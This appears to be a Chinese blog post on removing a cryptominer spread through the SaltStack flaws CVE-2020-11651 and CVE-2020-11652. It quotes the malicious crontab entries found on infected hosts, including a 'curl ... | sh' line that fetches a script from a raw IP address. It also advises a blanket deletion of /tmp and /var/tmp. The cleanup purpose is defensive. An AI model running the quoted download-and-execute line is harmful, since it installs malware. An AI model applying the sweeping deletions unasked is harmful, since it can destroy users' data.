手工清除Saltstack漏洞导致的挖矿病毒

Saltstack是基于python开发的一套C/S自动化运维工具。近日,SaltStack被爆存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652),其中:

CVE-2020-11651:为认证绕过漏洞,攻击者可构造恶意请求,绕过Salt Master的验证逻辑,调用相关未授权函数功能,达到远程命令执行目的。

CVE-2020-11652:为目录遍历漏洞,攻击者可构造恶意请求,读取服务器上任意文件,获取系统敏感信息信息。

 

漏洞影响版本

SaltStack < 2019.2.4

SaltStack < 3000.2

手工清理过程:

1. ssh到自己的主机,top指令查看,如果有salt-minions之类的进程占满cpu,说明中招了,先卸载一下salt-minion
centos/redhat:    yum remove salt-minion
ubuntu: apt remove salt-minion


2. 查看定时任务
crontab -l
如果看到类似这样
* * * * * curl http://217.8.117.137/c.sh | sh > /dev/null 2>&1
* * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
用 crontab -e 指令编辑定时任务
进入编辑器后,把上面两行删除然后保存退出,删除(按两下d删除光标行)和退出(按冒号,光标在最下面,输入wq回车)可参考vim的基本用法


3. 把上面的文件删除
rm -f /usr/bin/salt-store
rm -f /tmp/salt-store
rm -f /var/tmp/salt-store
rm -f /tmp/*
rm -f /var/tmp/*


4. 杀干坏事的进程
ps aux |grep salt-store
如果有值,则用
kill xxx
杀掉,xxx就是进程id(第二列的那个数字)
同样的道理,用
ps aux |grep salt-minions
查看,并用kill杀


5. top 观察一下,是否还有salt-minions,如果没有就正常了

你可能感兴趣的:(手工清除Saltstack漏洞导致的挖矿病毒)